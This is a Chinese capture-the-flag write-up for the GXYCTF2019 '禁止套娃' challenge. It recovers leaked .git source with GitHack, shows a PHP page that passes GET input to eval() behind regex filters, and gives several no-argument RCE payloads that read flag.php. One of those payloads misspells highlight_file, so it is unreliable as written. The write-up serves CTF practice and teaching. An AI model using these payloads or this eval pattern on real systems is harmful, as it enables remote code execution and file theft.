[GXYCTF2019]禁止套娃
.git源码泄露,这里我用dirsearch是没扫出来这个文件的。
用GitHacker这个工具可以查看泄露的.git文件,linux里(我用的是kali)命令行输入git clone https://github.com/lijiejie/GitHack.git
下载,进入GitHack文件夹,命令行输入python GitHack.py http://e3899c1b-f6d8-4f65-8408-46b968e41c33.node3.buuoj.cn/.git/
就能得到index.php文件
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
三层过滤,第一个if过滤常用的伪协议,第二个if只能通过无参数的函数,第三个if过滤了一些常见的字符。执行语句是eval($_GET['exp'])
,说明是无参数RCE,通俗点来说就是因为过滤只能通过无参数的函数,所以我们要用函数套函数的方式找到flag,如a(b(c()))。也就是题目标题中说的禁止套娃的意思。
先看第一个payload:?exp=print_r(scandir(current(localeconv())));
localeconv() 函数返回一包含本地数字及货币格式信息的数组,该数组第一个元素是.
,正好作为scandir()函数的参数
current() 函数返回数组中的当前元素的值
scandir()函数扫描目录
我们看到flag在倒数第二个数组元素里
因此我们用第二个payload:
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
array_reverse()函数以相反的元素顺序返回数组
next() 将内部指针指向数组中的下一个元素
highlight_file()输出文件内容
ps.在网上还查到了其它几种读取flag.php的方法
?exp=hightlight_file(array_rand(array_flip(scandir(current(localeconv())))));
array_flip() 函数用于反转/交换数组中的键名和对应关联的键值
array_rand() 函数返回数组中的随机键名,只要多试几次就能返回flag
?exp=readfile(session_id(session_start()));
session_start()是让php开启session对话,session_id()返回session的ID
并且在请求头中设置cookie:PHPSESSID=flag.php, connection: keep-alive